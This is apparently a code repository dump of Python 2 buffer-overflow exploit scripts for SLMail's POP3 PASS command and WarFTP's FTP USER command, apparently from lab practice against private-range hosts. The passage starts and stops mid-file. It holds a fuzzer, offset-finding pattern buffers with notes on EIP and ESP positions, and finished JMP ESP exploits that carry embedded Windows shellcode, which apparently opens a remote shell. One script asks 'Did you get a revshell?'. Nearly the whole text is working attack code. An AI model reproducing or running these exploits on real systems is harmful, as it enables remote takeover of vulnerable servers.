z5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9' 5 | 6 | try: 7 | print "\nSending evil buffer..." 8 | s.connect(('11.11.11.7',110)) 9 | data = s.recv(1024) 10 | s.send('USER username' +'\r\n') 11 | data = s.recv(1024) 12 | s.send('PASS ' + buffer + '\r\n') 13 | print "\nDone!." 14 | except: 15 | print "Could not connect to POP3!" 16 | -------------------------------------------------------------------------------- /slmail/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | buffer = 'A' * 2700 5 | try: 6 | print "\nSending evil buffer..." 7 | s.connect(('11.11.11.7',110)) 8 | data = s.recv(1024) 9 | s.send('USER username' +'\r\n') 10 | data = s.recv(1024) 11 | s.send('PASS ' + buffer + '\r\n') 12 | print "\nDone!." 13 | except: 14 | print "Could not connect to POP3!" 15 | -------------------------------------------------------------------------------- /slmail/jmpesp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | 5 | shellcode=("\xb8\xad\xf2\x90\xe3\xd9\xc8\xd9\x74\x24\xf4\x5b\x33\xc9\xb1" 6 | "\x52\x31\x43\x12\x03\x43\x12\x83\x6e\xf6\x72\x16\x8c\x1f\xf0" 7 | "\xd9\x6c\xe0\x95\x50\x89\xd1\x95\x07\xda\x42\x26\x43\x8e\x6e" 8 | "\xcd\x01\x3a\xe4\xa3\x8d\x4d\x4d\x09\xe8\x60\x4e\x22\xc8\xe3" 9 | "\xcc\x39\x1d\xc3\xed\xf1\x50\x02\x29\xef\x99\x56\xe2\x7b\x0f" 10 | "\x46\x87\x36\x8c\xed\xdb\xd7\x94\x12\xab\xd6\xb5\x85\xa7\x80" 11 | "\x15\x24\x6b\xb9\x1f\x3e\x68\x84\xd6\xb5\x5a\x72\xe9\x1f\x93" 12 | "\x7b\x46\x5e\x1b\x8e\x96\xa7\x9c\x71\xed\xd1\xde\x0c\xf6\x26" 13 | "\x9c\xca\x73\xbc\x06\x98\x24\x18\xb6\x4d\xb2\xeb\xb4\x3a\xb0" 14 | "\xb3\xd8\xbd\x15\xc8\xe5\x36\x98\x1e\x6c\x0c\xbf\xba\x34\xd6" 15 | "\xde\x9b\x90\xb9\xdf\xfb\x7a\x65\x7a\x70\x96\x72\xf7\xdb\xff" 16 | "\xb7\x3a\xe3\xff\xdf\x4d\x90\xcd\x40\xe6\x3e\x7e\x08\x20\xb9" 17 | "\x81\x23\x94\x55\x7c\xcc\xe5\x7c\xbb\x98\xb5\x16\x6a\xa1\x5d" 18 | "\xe6\x93\x74\xf1\xb6\x3b\x27\xb2\x66\xfc\x97\x5a\x6c\xf3\xc8" 19 | "\x7b\x8f\xd9\x60\x11\x6a\x8a\x85\xed\x7f\x48\xf2\xf3\x7f\x49" 20 | "\x3b\x7d\x99\x3b\x2b\x2b\x32\xd4\xd2\x76\xc8\x45\x1a\xad\xb5" 21 | "\x46\x90\x42\x4a\x08\x51\x2e\x58\xfd\x91\x65\x02\xa8\xae\x53" 22 | "\x2a\x36\x3c\x38\xaa\x31\x5d\x97\xfd\x16\x93\xee\x6b\x8b\x8a" 23 | "\x58\x89\x56\x4a\xa2\x09\x8d\xaf\x2d\x90\x40\x8b\x09\x82\x9c" 24 | "\x14\x16\xf6\x70\x43\xc0\xa0\x36\x3d\xa2\x1a\xe1\x92\x6c\xca" 25 | "\x74\xd9\xae\x8c\x78\x34\x59\x70\xc8\xe1\x1c\x8f\xe5\x65\xa9" 26 | "\xe8\x1b\x16\x56\x23\x98\x36\xb5\xe1\xd5\xde\x60\x60\x54\x83" 27 | "\x92\x5f\x9b\xba\x10\x55\x64\x39\x08\x1c\x61\x05\x8e\xcd\x1b" 28 | "\x16\x7b\xf1\x88\x17\xae") 29 | 30 | buffer = 'A' * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 16 + shellcode 31 | try: 32 | print "\nSending evil buffer..." 33 | s.connect(('11.11.11.7',110)) 34 | data = s.recv(1024) 35 | s.send('USER username' +'\r\n') 36 | data = s.recv(1024) 37 | s.send('PASS ' + buffer + '\r\n') 38 | s.close() 39 | print "\nDone!." 40 | except: 41 | print "Could not connect to POP3!" 42 | -------------------------------------------------------------------------------- /slmail/jmpesp2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | shellcode = ("\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" 5 | "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" 6 | "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" 7 | "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" 8 | "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" 9 | "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" 10 | "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" 11 | "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" 12 | "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" 13 | "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c" 14 | "\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68" 15 | "\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68" 16 | "\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0b\x0b\x0b\x02\x68" 17 | "\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61" 18 | "\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2" 19 | "\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6" 20 | "\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44" 21 | "\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56" 22 | "\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff" 23 | "\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6" 24 | "\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 25 | "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5") 26 | 27 | buffer= "A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 16 + shellcode + "C" * (3500-2606-4-324) 28 | try: 29 | print "\nSending evil buffer..." 30 | s.connect(('11.11.11.7',110)) 31 | data = s.recv(1024) 32 | s.send('USER username' +'\r\n') 33 | data = s.recv(1024) 34 | s.send('PASS ' + buffer + '\r\n') 35 | s.close() 36 | print "\nDone. Did you get a revshell?" 37 | except: 38 | print "Could not connect to POP3!" 39 | 40 | -------------------------------------------------------------------------------- /warftp/ftpexploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | #buffer = "A" * 1100 4 | buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk" 5 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 6 | connect=s.connect(('11.11.11.6',21)) 7 | response = s.recv(1024) 8 | print response 9 | s.send('USER ' + buffer + '\r\n') 10 | response = s.recv(1024) 11 | print response 12 | s.send('PASS PASSWORD\r\n') 13 | s.close() 14 | -------------------------------------------------------------------------------- /warftp/ftpexploitbreakpoint.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | buffer = "A" * 485 + "B" * 4 + "C" * 611 4 | #0x77c35459 5 | #module to jump to is 0x7C9D30D7 6 | #address is 00AFFD48 7 | #eip is at byte 485 8 | #esp is at byte 493, eight bytes away 9 | #buffer = "A" * 1100 10 | #buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk" 11 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 12 | connect=s.connect(('11.11.11.6',21)) 13 | response = s.recv(1024) 14 | print response 15 | s.send('USER ' + buffer + '\r\n') 16 | response = s.recv(1024) 17 | print response 18 | s.send('PASS PASSWORD\r\n') 19 | s.close() 20 | -------------------------------------------------------------------------------- /warftp/ftpexploitbreakpointjumpesp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | 5 | shellcode = ("\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" + 6 | "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" + 7 | "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" + 8 | "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" + 9 | "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" + 10 | "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" + 11 | "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" + 12 | "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" + 13 | "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" + 14 | "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" + 15 | "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" + 16 | "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" + 17 | "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" + 18 | "\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68" + 19 | "\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89" + 20 | "\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57" + 21 | "\x68\xb7\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1" + 22 | "\xff\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63" + 23 | "\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59" + 24 | "\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24" + 25 | "\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56" + 26 | "\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e" + 27 | "\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0" + 28 | "\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" + 29 | "\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00" + 30 | "\x53\xff\xd5") 31 | 32 | buffer = "A" * 485 + "\xD7\x30\x9D\x7C" + "C" * 4 + "\x81\xc4\x24\xfa\xff\xff" + shellcode 33 | 34 | #module to jump to is 0x7C9D30D7 35 | #address is 00AFFD48 36 | #eip is at byte 485 37 | #esp is at byte 493, eight bytes away 38 | #buffer = "A" * 1100 39 | #buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk" 40 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 41 | connect=s.connect(('11.11.11.6',21)) 42 | response = s.recv(1024) 43 | print response 44 | s.send('USER ' + buffer + '\r\n') 45 | response = s.recv(1024) 46 | print response 47 | s.send('PASS PASSWORD\r\n') 48 | s.close() 49 | -------------------------------------------------------------------------------- /warftp/ftpexploitbreakpointjumpesp.py.save: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/python 3 | import socket 4 | 5 | 6 | shellcode = ("\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" + 7 | "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" + 8 | "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" + 9 | "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" + 10 | "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" + 11 | "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" + 12 | "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" + 13 | "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" + 14 | "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" + 15 | "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" + 16 | "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" + 17 | "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" + 18 | "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" + 19 | "\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68" + 20 | "\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89" + 21 | "\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57" + 22 | "\x68\xb7\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1" + 23 | "\xff\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63" + 24 | "\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59" + 25 | "\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24" + 26 | "\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56" + 27 | "\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e" + 28 | "\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0" + 29 | "\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" + 30 | "\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00" + 31 | "\x53\xff\xd5") 32 | 33 | buffer = "A" * 485 + "\xD7\x30\x9D\x7C" + "C" * 4 + shellcode 34 | 35 | #module to jump to is 0x7C9D30D7 36 | #address is 00AFFD48 37 | #eip is at byte 485 38 | #esp is at byte 493, eight bytes away 39 | #buffer = "A" * 1100 40 | #buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk" 41 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 42 | connect=s.connect(('11.11.11.6',21)) 43 | response = s.recv(1024) 44 | print response 45 | s.send('USER ' + buffer + '\r\n') 46 | response = s.recv(1024) 47 | print response 48 | s.send('PASS PASSWORD\r\n') 49 | s.close() 50 | -------------------------------------------------------------------------------- /warftp/ftpexploitbreakpointjumpespsecondgo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | 5 | shellcode = ("\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" + 6 | "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" + 7 | "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" + 8 | "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" + 9 | "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" + 10 | "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" + 11 | "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" + 12 | "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" + 13 | "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" + 14 | "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" + 15 | "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" + 16 | "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" + 17 | "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" + 18 | "\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68" + 19 | "\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89" + 20 | "\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57" + 21 | "\x68\xb7\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1" + 22 | "\xff\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63" + 23 | "\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59" + 24 | "\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24" + 25 | "\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56" + 26 | "\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e" + 27 | "\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0" + 28 | "\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" + 29 | "\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00" + 30 | "\x53\xff\xd5") 31 | 32 | buffer = "A" * 485 + "\xFF\x9B\x55\x77" + "C" * 4 + "\x81\xc4\x24\xfa\xff\xff" + shellcode 33 | #module to jump to 